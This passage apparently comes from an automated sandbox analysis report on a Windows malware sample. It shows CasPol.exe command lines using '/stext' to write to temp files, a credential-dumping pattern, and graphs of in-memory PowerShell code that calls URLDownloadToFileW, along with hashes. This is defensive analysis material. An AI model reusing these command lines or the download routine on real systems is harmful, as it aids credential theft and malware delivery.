                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv"
                                                                                                                                                            Imagebase:0x730000
                                                                                                                                                            File size:108'664 bytes
                                                                                                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:16
                                                                                                                                                            Start time:01:38:45
                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nwvgdqxnygriykln"
                                                                                                                                                            Imagebase:0x950000
                                                                                                                                                            File size:108'664 bytes
                                                                                                                                                            MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Has exited:true

                                                                                                                                                            Reset < >
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000003.1742525520.0000000006540000.00000010.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_3_6540000_mshta.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                              • Instruction ID: cd5ded1b5766b3d5d9e51e95f3605ecd66ea4db0933da4df4291dbfa8559a263
                                                                                                                                                              • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000003.1742525520.0000000006540000.00000010.00000800.00020000.00000000.sdmp, Offset: 06540000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_3_6540000_mshta.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                              • Instruction ID: cd5ded1b5766b3d5d9e51e95f3605ecd66ea4db0933da4df4291dbfa8559a263
                                                                                                                                                              • Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
                                                                                                                                                              • Instruction Fuzzy Hash:

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:3.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:17%
                                                                                                                                                              Total number of Nodes:47
                                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                                              execution_graph 10149 4ea7480 10150 4ea74be 10149->10150 10152 4ea764a 10150->10152 10157 4ea7da8 10150->10157 10161 4ea7c45 10150->10161 10169 4ea7a18 10150->10169 10178 4ea7a08 10150->10178 10151 4ea75df 10158 4ea7cf9 10157->10158 10158->10157 10187 7954610 10158->10187 10195 79545f4 10158->10195 10162 4ea7b9a 10161->10162 10166 4ea7c5e 10161->10166 10162->10161 10163 4ea7de8 URLDownloadToFileW 10162->10163 10165 4ea7ea8 10163->10165 10165->10151 10167 79545f4 3 API calls 10166->10167 10168 7954610 3 API calls 10166->10168 10167->10166 10168->10166 10174 4ea7a4c 10169->10174 10170 4ea7de8 URLDownloadToFileW 10173 4ea7ea8 10170->10173 10171 4ea7b30 10171->10151 10173->10151 10174->10170 10174->10171 10175 4ea7c5e 10174->10175 10176 79545f4 3 API calls 10175->10176 10177 7954610 3 API calls 10175->10177 10176->10175 10177->10175 10179 4ea7a4c 10178->10179 10180 4ea7de8 URLDownloadToFileW 10179->10180 10181 4ea7b30 10179->10181 10184 4ea7c5e 10179->10184 10183 4ea7ea8 10180->10183 10181->10151 10183->10151 10185 79545f4 3 API calls 10184->10185 10186 7954610 3 API calls 10184->10186 10185->10184 10186->10184 10188 7954a93 10187->10188 10189 7954641 10187->10189 10188->10158 10189->10188 10191 4ea7a08 4 API calls 10189->10191 10192 4ea7a18 4 API calls 10189->10192 10194 4ea7c45 4 API calls 10189->10194 10203 4ea1c00 10189->10203 10190 7954a34 10190->10158 10191->10190 10192->10190 10194->10190 10197 7954608 10195->10197 10196 7954a93 10196->10158 10197->10196 10199 4ea7a08 4 API calls 10197->10199 10200 4ea7a18 4 API calls 10197->10200 10201 4ea1c00 URLDownloadToFileW 10197->10201 10202 4ea7c45 4 API calls 10197->10202 10198 7954a34 10198->10158 10199->10198 10200->10198 10201->10198 10202->10198 10205 4ea7e00 URLDownloadToFileW 10203->10205 10206 4ea7ea8 10205->10206 10206->10190

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 351 4ea7a18-4ea7a4a 352 4ea7a4c-4ea7a53 351->352 353 4ea7a90 351->353 355 4ea7a64 352->355 356 4ea7a55-4ea7a62 352->356 354 4ea7a93-4ea7acf 353->354 363 4ea7b58-4ea7b63 354->363 364 4ea7ad5-4ea7ade 354->364 357 4ea7a66-4ea7a68 355->357 356->357 360 4ea7a6a-4ea7a6d 357->360 361 4ea7a6f-4ea7a71 357->361 362 4ea7a8e 360->362 365 4ea7a82 361->365 366 4ea7a73-4ea7a80 361->366 362->354 367 4ea7b72-4ea7b94 363->367 368 4ea7b65-4ea7b68 363->368 364->363 369 4ea7ae0-4ea7ae6 364->369 370 4ea7a84-4ea7a86 365->370 366->370 377 4ea7b9a-4ea7ba3 367->377 378 4ea7c5e-4ea7cf6 367->378 368->367 371 4ea7de8-4ea7e52 369->371 372 4ea7aec-4ea7af9 369->372 370->362 388 4ea7e5d-4ea7e63 371->388 389 4ea7e54-4ea7e5a 371->389 374 4ea7afb-4ea7b2e 372->374 375 4ea7b4f-4ea7b56 372->375 390 4ea7b4b 374->390 391 4ea7b30-4ea7b33 374->391 375->363 375->369 377->371 380 4ea7ba9-4ea7be7 377->380 416 4ea7cf9-4ea7d52 378->416 397 4ea7be9-4ea7bff 380->397 398 4ea7c01-4ea7c14 380->398 393 4ea7e71-4ea7ea6 URLDownloadToFileW 388->393 394 4ea7e65-4ea7e6e 388->394 389->388 390->375 395 4ea7b3f-4ea7b48 391->395 396 4ea7b35-4ea7b38 391->396 400 4ea7ea8-4ea7eae 393->400 401 4ea7eaf-4ea7ec3 393->401 394->393 396->395 402 4ea7c16-4ea7c1d 397->402 398->402 400->401 403 4ea7c1f-4ea7c30 402->403 404 4ea7c42-4ea7c58 402->404 403->404 410 4ea7c32-4ea7c3b 403->410 404->377 404->378 410->404 429 4ea7d55 call 79545f4 416->429 430 4ea7d55 call 7954610 416->430 421 4ea7d57-4ea7d60 422 4ea7d7a-4ea7d8d 421->422 423 4ea7d62-4ea7d78 421->423 424 4ea7d8f-4ea7d96 422->424 423->424 425 4ea7d98-4ea7d9e 424->425 426 4ea7da5-4ea7daf 424->426 425->426 426->416 429->421 430->421
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1845374205.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4ea0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: d68fd129c31f4dbf38e334a946849ebfba917168f1b1f3145f77bd4ea9ab8800
                                                                                                                                                              • Instruction ID: c2733e5114f0b8d61fd036322da654fe31e329040af593f133e8e2f04762b67a
                                                                                                                                                              • Opcode Fuzzy Hash: d68fd129c31f4dbf38e334a946849ebfba917168f1b1f3145f77bd4ea9ab8800
                                                                                                                                                              • Instruction Fuzzy Hash: D4E11775A00209EFDB05DF98D584A9EFBB2FF88314F248159E804AB365D731ED95CB90

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 7951f40-7951f65 2 7952158-7952175 0->2 3 7951f6b-7951f70 0->3 13 7952177-79521a2 2->13 14 79521df 2->14 4 7951f72-7951f78 3->4 5 7951f88-7951f8c 3->5 9 7951f7c-7951f86 4->9 10 7951f7a 4->10 6 7951f92-7951f94 5->6 7 7952108-7952112 5->7 11 7951fa4 6->11 12 7951f96-7951fa2 6->12 15 7952114-795211d 7->15 16 7952120-7952126 7->16 9->5 10->5 17 7951fa6-7951fa8 11->17 12->17 25 7952326-795233d 13->25 26 79521a8-79521ad 13->26 23 79521e3-79521e5 14->23 20 795212c-7952138 16->20 21 7952128-795212a 16->21 17->7 24 7951fae-7951fcd 17->24 27 795213a-7952155 20->27 21->27 28 79522d8-79522e2 23->28 29 79521eb-795220a 23->29 62 7951fdd 24->62 63 7951fcf-7951fdb 24->63 44 79523a7 25->44 45 795233f-7952346 25->45 30 79521c5-79521c9 26->30 31 79521af-79521b5 26->31 32 79522e4-79522ec 28->32 33 79522ef-79522f5 28->33 58 795220c-7952218 29->58 59 795221a 29->59 30->28 40 79521cf-79521d1 30->40 38 79521b7 31->38 39 79521b9-79521c3 31->39 41 79522f7-79522f9 33->41 42 79522fb-7952307 33->42 38->30 39->30 46 79521e1 40->46 47 79521d3-79521dc 40->47 48 7952309-7952323 41->48 42->48 51 79523ab-79523ad 44->51 53 795234f-795236a 45->53 54 7952348-795234d 45->54 46->23 47->14 60 79523b3-79523b5 51->60 61 7952432-795243c 51->61 64 7952480-79524a6 53->64 65 7952370-7952375 53->65 54->53 66 795221c-795221e 58->66 59->66 69 79523b7-79523bd 60->69 70 79523cf-79523d6 60->70 67 795243e-7952446 61->67 68 7952449-795244f 61->68 71 7951fdf-7951fe1 62->71 63->71 89 79524af-79524b5 64->89 90 79524a8-79524ad 64->90 72 7952377-795237d 65->72 73 795238d-7952391 65->73 66->28 77 7952224-795225b 66->77 78 7952455-7952461 68->78 79 7952451-7952453 68->79 80 79523c1-79523cd 69->80 81 79523bf 69->81 85 79523ee-795242f 70->85 86 79523d8-79523de 70->86 71->7 82 7951fe7-7951fee 71->82 83 7952381-795238b 72->83 84 795237f 72->84 73->61 74 7952397-7952399 73->74 87 79523a9 74->87 88 795239b-79523a4 74->88 122 7952275-795227c 77->122 123 795225d-7952263 77->123 95 7952463-795247d 78->95 79->95 80->70 81->70 82->2 91 7951ff4-7951ff9 82->91 83->73 84->73 92 79523e0 86->92 93 79523e2-79523ec 86->93 87->51 88->44 98 79524b7-79524d9 89->98 99 79524e3-79524ed 89->99 90->89 101 7952011-7952020 91->101 102 7951ffb-7952001 91->102 92->85 93->85 124 795252d-7952556 98->124 125 79524db-79524e0 98->125 104 79524f7-79524fd 99->104 105 79524ef-79524f4 99->105 101->7 118 7952026-7952044 101->118 106 7952005-795200f 102->106 107 7952003 102->107 112 7952503-795250f 104->112 113 79524ff-7952501 104->113 106->101 107->101 117 7952511-795252a 112->117 113->117 118->7 139 795204a-795206f 118->139 130 7952294-79522d5 122->130 131 795227e-7952284 122->131 128 7952265 123->128 129 7952267-7952273 123->129 143 7952585-795258e 124->143 144 7952558-795257e 124->144 128->122 129->122 132 7952286 131->132 133 7952288-7952292 131->133 132->130 133->130 139->7 150 7952075-795207c 139->150 148 7952597-79525a0 143->148 149 7952590-7952595 143->149 144->143 152 79525a2-79525b4 148->152 153 79525ed-79525f7 148->153 149->148 154 79520c2-79520f5 150->154 155 795207e-7952099 150->155 152->153 156 79525b6-79525d3 152->156 157 7952600-7952606 153->157 158 79525f9-79525fd 153->158 176 79520fc-7952105 154->176 163 79520b3-79520b7 155->163 164 795209b-79520a1 155->164 170 79525d5-79525e7 156->170 171 795263d-7952642 156->171 161 795260c-7952618 157->161 162 7952608-795260a 157->162 166 795261a-795263a 161->166 162->166 173 79520be-79520c0 163->173 167 79520a5-79520b1 164->167 168 79520a3 164->168 167->163 168->163 170->153 171->170 173->176
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                              • API String ID: 0-1420252700
                                                                                                                                                              • Opcode ID: cbc690cd27fa2d72e4221515eb17596e339207842071994bd8688d61a8a5cfe8
                                                                                                                                                              • Instruction ID: 01ad854028c2d4a97d028df102a7e58370dc47b14ca21564d360623af15f4933
                                                                                                                                                              • Opcode Fuzzy Hash: cbc690cd27fa2d72e4221515eb17596e339207842071994bd8688d61a8a5cfe8
                                                                                                                                                              • Instruction Fuzzy Hash: A71239F17043258FDB15CB68881076ABFA6AFD2318F1484BADD05CF295DB31C886C7A2

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 183 7954610-795463b 184 7954641-7954646 183->184 185 7954af2-7954b25 183->185 186 795465e-7954663 184->186 187 7954648-795464e 184->187 193 7954b35 185->193 194 7954b27-7954b33 185->194 191 7954665-7954671 186->191 192 7954673 186->192 188 7954650 187->188 189 7954652-795465c 187->189 188->186 189->186 195 7954675-7954677 191->195 192->195 197 7954b37-7954b39 193->197 194->197 198 7954a93-7954a9d 195->198 199 795467d-7954687 195->199 202 7954b7b-7954b85 197->202 203 7954b3b-7954b42 197->203 200 7954a9f-7954aa8 198->200 201 7954aab-7954ab1 198->201 199->185 204 795468d-7954692 199->204 205 7954ab7-7954ac3 201->205 206 7954ab3-7954ab5 201->206 210 7954b87-7954b8b 202->210 211 7954b8e-7954b94 202->211 203->202 207 7954b44-7954b61 203->207 208 7954694-795469a 204->208 209 79546aa-79546b8 204->209 214 7954ac5-7954aef 205->214 206->214 223 7954b63-7954b75 207->223 224 7954bc9-7954bce 207->224 215 795469c 208->215 216 795469e-79546a8 208->216 209->198 221 79546be-79546dd 209->221 212 7954b96-7954b98 211->212 213 7954b9a-7954ba6 211->213 218 7954ba8-7954bc6 212->218 213->218 215->209 216->209 221->198 233 79546e3-79546ed 221->233 223->202 224->223 233->185 234 79546f3-79546f8 233->234 235 7954710-7954714 234->235 236 79546fa-7954700 234->236 235->198 239 795471a-795471e 235->239 237 7954704-795470e 236->237 238 7954702 236->238 237->235 238->235 239->198 240 7954724-7954728 239->240 240->198 241 795472e-795473e 240->241 243 7954744-795476b 241->243 244 79547c6-7954815 241->244 249 7954785-79547b3 243->249 250 795476d-7954773 243->250 261 795481c-795482f 244->261 258 79547b5-79547b7 249->258 259 79547c1-79547c4 249->259 251 7954775 250->251 252 7954777-7954783 250->252 251->249 252->249 258->259 259->261 262 7954835-795485c 261->262 263 79548b7-7954906 261->263 268 7954876-79548a4 262->268 269 795485e-7954864 262->269 280 795490d-7954920 263->280 277 79548a6-79548a8 268->277 278 79548b2-79548b5 268->278 270 7954866 269->270 271 7954868-7954874 269->271 270->268 271->268 277->278 278->280 281 7954926-795494d 280->281 282 79549a8-79549f7 280->282 287 7954967-7954995 281->287 288 795494f-7954955 281->288 299 79549fe-7954a2c 282->299 297 7954997-7954999 287->297 298 79549a3-79549a6 287->298 289 7954957 288->289 290 7954959-7954965 288->290 289->287 290->287 297->298 298->299 304 7954a2f call 4ea7a08 299->304 305 7954a2f call 4ea7a18 299->305 306 7954a2f call 4ea1c00 299->306 307 7954a2f call 4ea7c45 299->307 302 7954a34-7954a90 304->302 305->302 306->302 307->302
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: tP^q$tP^q
                                                                                                                                                              • API String ID: 0-309238000
                                                                                                                                                              • Opcode ID: a8271732907567ca51408175ce51194ac7786fb099c1f02a252eb34a795ededa
                                                                                                                                                              • Instruction ID: b954f5a3cfec4ea54fcaf044f50330e3e7cf4bbee8dbb75d4baabdf5a2706e72
                                                                                                                                                              • Opcode Fuzzy Hash: a8271732907567ca51408175ce51194ac7786fb099c1f02a252eb34a795ededa
                                                                                                                                                              • Instruction Fuzzy Hash: C8F1F4B0B00255AFCF14DF68C814B6EBBE6EBC9714F148869E8059B3A0DA71DC85C7D1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 308 79504f8-795050a 311 7950510-7950521 308->311 312 79505ca-79505ee 308->312 315 7950523-7950529 311->315 316 795053b-7950558 311->316 317 79505f7-79505fd 312->317 318 79505f0-79505f6 312->318 319 795052d-7950539 315->319 320 795052b 315->320 316->312 326 795055a-795057c 316->326 321 79505ff-795063e 317->321 322 795066b-7950675 317->322 318->317 319->316 320->316 341 7950640-795064e 321->341 342 79506bb-79506c0 321->342 324 7950677-795067d 322->324 325 7950680-7950686 322->325 328 795068c-7950698 325->328 329 7950688-795068a 325->329 336 7950596-79505ae 326->336 337 795057e-7950584 326->337 331 795069a-79506b8 328->331 329->331 346 79505b0-79505b2 336->346 347 79505bc-79505c7 336->347 339 7950586 337->339 340 7950588-7950594 337->340 339->336 340->336 350 7950656-7950665 341->350 342->341 346->347 350->322
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: tP^q$tP^q
                                                                                                                                                              • API String ID: 0-309238000
                                                                                                                                                              • Opcode ID: c3ebefd8fc74fe16b5cc1453f7918044a11f0317cd135a7afb109a1087022e50
                                                                                                                                                              • Instruction ID: 6269c515c69835687eef13137305498b27076dade1fc5542a4d2ae2cded9214b
                                                                                                                                                              • Opcode Fuzzy Hash: c3ebefd8fc74fe16b5cc1453f7918044a11f0317cd135a7afb109a1087022e50
                                                                                                                                                              • Instruction Fuzzy Hash: 1E5147B1B00324AFC7119B7D8814B6ABBE6AFC5714F14885AE948DF381CA71DC46C3E1

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 431 4ea1c00-4ea7e52 434 4ea7e5d-4ea7e63 431->434 435 4ea7e54-4ea7e5a 431->435 436 4ea7e71-4ea7ea6 URLDownloadToFileW 434->436 437 4ea7e65-4ea7e6e 434->437 435->434 438 4ea7ea8-4ea7eae 436->438 439 4ea7eaf-4ea7ec3 436->439 437->436 438->439
                                                                                                                                                              APIs
                                                                                                                                                              • URLDownloadToFileW.URLMON(?,00000000,00000000,?,00000001), ref: 04EA7E99
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1845374205.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4ea0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DownloadFile
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1407266417-0
                                                                                                                                                              • Opcode ID: 0a9c98a1256a118f2f3c4ce2db6eacb58848f80751f79240ae12ecd90242c7e5
                                                                                                                                                              • Instruction ID: 843ee09142c203ca8b3bfe4ca14cd7cf2554a217263d003bffac018711ca66af
                                                                                                                                                              • Opcode Fuzzy Hash: 0a9c98a1256a118f2f3c4ce2db6eacb58848f80751f79240ae12ecd90242c7e5
                                                                                                                                                              • Instruction Fuzzy Hash: 6621E4B5D01659EFCB04CF99D984ADEFBF4FB48310F10852AE918A7250D374AA54CBA4

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 441 79545f4-7954606 442 795460f-795463b 441->442 443 7954608-795460e 441->443 445 7954641-7954646 442->445 446 7954af2-7954b25 442->446 443->442 448 795465e-7954663 445->448 449 7954648-795464e 445->449 455 7954b35 446->455 456 7954b27-7954b33 446->456 453 7954665-7954671 448->453 454 7954673 448->454 450 7954650 449->450 451 7954652-795465c 449->451 450->448 451->448 457 7954675-7954677 453->457 454->457 459 7954b37-7954b39 455->459 456->459 460 7954a93-7954a9d 457->460 461 795467d-7954687 457->461 464 7954b7b-7954b85 459->464 465 7954b3b-7954b42 459->465 462 7954a9f-7954aa8 460->462 463 7954aab-7954ab1 460->463 461->446 466 795468d-7954692 461->466 467 7954ab7-7954ac3 463->467 468 7954ab3-7954ab5 463->468 472 7954b87-7954b8b 464->472 473 7954b8e-7954b94 464->473 465->464 469 7954b44-7954b61 465->469 470 7954694-795469a 466->470 471 79546aa-79546b8 466->471 476 7954ac5-7954aef 467->476 468->476 485 7954b63-7954b75 469->485 486 7954bc9-7954bce 469->486 477 795469c 470->477 478 795469e-79546a8 470->478 471->460 483 79546be-79546dd 471->483 474 7954b96-7954b98 473->474 475 7954b9a-7954ba6 473->475 480 7954ba8-7954bc6 474->480 475->480 477->471 478->471 483->460 495 79546e3-79546ed 483->495 485->464 486->485 495->446 496 79546f3-79546f8 495->496 497 7954710-7954714 496->497 498 79546fa-7954700 496->498 497->460 501 795471a-795471e 497->501 499 7954704-795470e 498->499 500 7954702 498->500 499->497 500->497 501->460 502 7954724-7954728 501->502 502->460 503 795472e-795473e 502->503 505 7954744-795476b 503->505 506 79547c6-7954815 503->506 511 7954785-79547b3 505->511 512 795476d-7954773 505->512 523 795481c-795482f 506->523 520 79547b5-79547b7 511->520 521 79547c1-79547c4 511->521 513 7954775 512->513 514 7954777-7954783 512->514 513->511 514->511 520->521 521->523 524 7954835-795485c 523->524 525 79548b7-7954906 523->525 530 7954876-79548a4 524->530 531 795485e-7954864 524->531 542 795490d-7954920 525->542 539 79548a6-79548a8 530->539 540 79548b2-79548b5 530->540 532 7954866 531->532 533 7954868-7954874 531->533 532->530 533->530 539->540 540->542 543 7954926-795494d 542->543 544 79549a8-79549f7 542->544 549 7954967-7954995 543->549 550 795494f-7954955 543->550 561 79549fe-7954a2c 544->561 559 7954997-7954999 549->559 560 79549a3-79549a6 549->560 551 7954957 550->551 552 7954959-7954965 550->552 551->549 552->549 559->560 560->561 566 7954a2f call 4ea7a08 561->566 567 7954a2f call 4ea7a18 561->567 568 7954a2f call 4ea1c00 561->568 569 7954a2f call 4ea7c45 561->569 564 7954a34-7954a90 566->564 567->564 568->564 569->564
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: tP^q
                                                                                                                                                              • API String ID: 0-2862610199
                                                                                                                                                              • Opcode ID: 283f0fa637e371010685819739e0b27e4b6667a89f165d66dcda6d2664623e11
                                                                                                                                                              • Instruction ID: 18a9bcd2806d561d730902fea9e1ca3f475d3cbb8cb26c1e969ab65fa53ff4b5
                                                                                                                                                              • Opcode Fuzzy Hash: 283f0fa637e371010685819739e0b27e4b6667a89f165d66dcda6d2664623e11
                                                                                                                                                              • Instruction Fuzzy Hash: FA91C1B0A002A5ABCF54CF58C454B69BBF6BB89718F148569EC049F3A0DB71EC85CBD1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: dd3ff57fb8c56498678e5e77332c164c608103cd0735460260c3eeea05bd0030
                                                                                                                                                              • Instruction ID: 0504e2fb7ec5a1680f859be145461bf983d98773c0acb31994c63029fcf1d57d
                                                                                                                                                              • Opcode Fuzzy Hash: dd3ff57fb8c56498678e5e77332c164c608103cd0735460260c3eeea05bd0030
                                                                                                                                                              • Instruction Fuzzy Hash: FF411AF0A45326DFDB21CB288D01B7A7FB6BF81218F5940A5DD009F292D735D841CBA1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1844631601.00000000049BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049BD000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_49bd000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 181a2d1cc23c585162d26a37680bd50d017998b394c95e3aebe4608051a7a984
                                                                                                                                                              • Instruction ID: 5575b7a2635f3887bff478f638c4f771201f87fc498b6d69db63afcf73a84356
                                                                                                                                                              • Opcode Fuzzy Hash: 181a2d1cc23c585162d26a37680bd50d017998b394c95e3aebe4608051a7a984
                                                                                                                                                              • Instruction Fuzzy Hash: 49012B315097409AE7104E25DE847A7BFDCEF41324F18CA39ED884B146C279E841DAF1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1844631601.00000000049BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049BD000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_49bd000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 668d5a8302f6777d1f92d53b24253ac22c54cb22aaa21393ea92b66c57cad08d
                                                                                                                                                              • Instruction ID: e506dd9d72eae956fa0e3eace18fcff7fb386a8a7ded1aa41fc85fd8dd160f13
                                                                                                                                                              • Opcode Fuzzy Hash: 668d5a8302f6777d1f92d53b24253ac22c54cb22aaa21393ea92b66c57cad08d
                                                                                                                                                              • Instruction Fuzzy Hash: FC01526140E3C05ED7124B259994792BFB8EF43224F1DC5DBD9888F193C2695845C7B2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1845374205.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4ea0000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 8e66b4d2a8ef1337bf1b3f9e8fc3cebb7416250b31af8c00801ac87a31677ab8
                                                                                                                                                              • Instruction ID: e51ed93b25005c49c0587f87e6a48d7effc4407a36d3930c040d4de73d130e0e
                                                                                                                                                              • Opcode Fuzzy Hash: 8e66b4d2a8ef1337bf1b3f9e8fc3cebb7416250b31af8c00801ac87a31677ab8
                                                                                                                                                              • Instruction Fuzzy Hash: 774127E680EBC11FE7174B2469AA2D57F709F23348F0B11D7D481CB0A3A959590BC3A2
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.1852853709.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_7950000_powershell.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q
                                                                                                                                                              • API String ID: 0-1267544974
                                                                                                                                                              • Opcode ID: 7711106342d3727820b01cdbdfd540e453c0f6e04e2480ddbcdfd2a120d2e0ff
                                                                                                                                                              • Instruction ID: 0c7da3885c04f656e709642336d9765adb494b43693f9feef06ba178a264b713
                                                                                                                                                              • Opcode Fuzzy Hash: 7711106342d3727820b01cdbdfd540e453c0f6e04e2480ddbcdfd2a120d2e0ff
                                                                                                                                                              • Instruction Fuzzy Hash: 34F169B1B4422A8FDB21CB6C98107AABBEAAFD5324F14847AD905CB351DB31CD46C7D1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
